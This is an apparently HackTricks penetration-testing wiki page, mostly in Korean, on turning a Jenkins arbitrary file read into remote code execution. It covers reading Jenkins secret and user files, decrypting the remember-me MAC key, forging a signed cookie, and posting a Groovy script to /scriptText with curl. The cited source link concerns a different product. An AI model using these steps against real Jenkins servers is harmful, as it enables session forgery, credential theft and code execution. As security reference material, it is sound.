Jenkins Arbitrary File Read to RCE via "Remember Me"

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

이 블로그 게시물에서는 Jenkins의 Local File Inclusion 취약점을 RCE로 변환하는 훌륭한 방법을 찾을 수 있습니다: https://blog.securelayer7.net/spring-cloud-skipper-vulnerability/

이것은 임의의 쿠키를 악용하여 RCE를 얻는 게시물의 요약입니다. 제가 직접 요약을 작성할 시간이 생길 때까지 사용됩니다:

공격 전제 조건

기능 요구 사항: "Remember me"가 활성화되어 있어야 합니다 (기본 설정).
접근 수준: 공격자는 Overall/Read 권한이 필요합니다.
비밀 접근: 주요 파일에서 이진 및 텍스트 콘텐츠를 읽을 수 있는 능력.

상세한 악용 과정

1단계: 데이터 수집

사용자 정보 검색

각 사용자에 대한 $JENKINS_HOME/users/*.xml에서 사용자 구성 및 비밀을 접근하여 수집합니다:
사용자 이름
사용자 시드
타임스탬프
비밀번호 해시

비밀 키 추출

쿠키 서명에 사용되는 암호화 키를 추출합니다:
비밀 키: $JENKINS_HOME/secret.key
마스터 키: $JENKINS_HOME/secrets/master.key
MAC 키 파일: $JENKINS_HOME/secrets/org.springframework.security.web.authentication.rememberme.TokenBasedRememberMeServices.mac

2단계: 쿠키 위조

토큰 준비

토큰 만료 시간 계산:

tokenExpiryTime = currentServerTimeInMillis() + 3600000  // 현재 시간에 1시간 추가

토큰을 위한 데이터 연결:

token = username + ":" + tokenExpiryTime + ":" + userSeed + ":" + secretKey

MAC 키 복호화

MAC 키 파일 복호화:

key = toAes128Key(masterKey)  // 마스터 키를 AES128 키 형식으로 변환
decrypted = AES.decrypt(macFile, key)  // .mac 파일 복호화
if not decrypted.hasSuffix("::::MAGIC::::")
return ERROR;
macKey = decrypted.withoutSuffix("::::MAGIC::::")

서명 계산

HMAC SHA256 계산:

mac = HmacSHA256(token, macKey)  // 토큰과 MAC 키를 사용하여 HMAC 계산
tokenSignature = bytesToHexString(mac)  // MAC을 16진수 문자열로 변환

쿠키 인코딩

최종 쿠키 생성:

cookie = base64.encode(username + ":" + tokenExpiryTime + ":" + tokenSignature)  // 쿠키 데이터를 Base64로 인코딩

3단계: 코드 실행

세션 인증

CSRF 및 세션 토큰 가져오기:
/crumbIssuer/api/json에 요청을 보내 Jenkins-Crumb를 얻습니다.
응답에서 JSESSIONID를 캡처하여 remember-me 쿠키와 함께 사용합니다.

명령 실행 요청

Groovy 스크립트로 POST 요청 보내기:

curl -X POST "$JENKINS_URL/scriptText" \
--cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \
--header "Jenkins-Crumb: $CRUMB" \
--header "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "script=$SCRIPT"

Groovy 스크립트는 시스템 수준의 명령이나 Jenkins 환경 내에서 다른 작업을 실행하는 데 사용할 수 있습니다.

제공된 curl 명령 예시는 임의의 코드를 안전하게 실행하기 위해 필요한 헤더와 쿠키로 Jenkins에 요청을 보내는 방법을 보여줍니다.

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousJenkins RCE Creating/Modifying Pipeline NextJenkins Dumping Secrets from Groovy

Last updated 3 days ago

key = toAes128Key(masterKey) // 마스터 키를 AES128 키 형식으로 변환 decrypted = AES.decrypt(macFile, key) // .mac 파일 복호화 if not decrypted.hasSuffix("::::MAGIC::::") return ERROR; macKey = decrypted.withoutSuffix("::::MAGIC::::")

curl -X POST "$JENKINS_URL/scriptText" \ --cookie "remember-me=$REMEMBER_ME_COOKIE; JSESSIONID...=$JSESSIONID" \ --header "Jenkins-Crumb: $CRUMB" \ --header "Content-Type: application/x-www-form-urlencoded" \ --data-urlencode "script=$SCRIPT"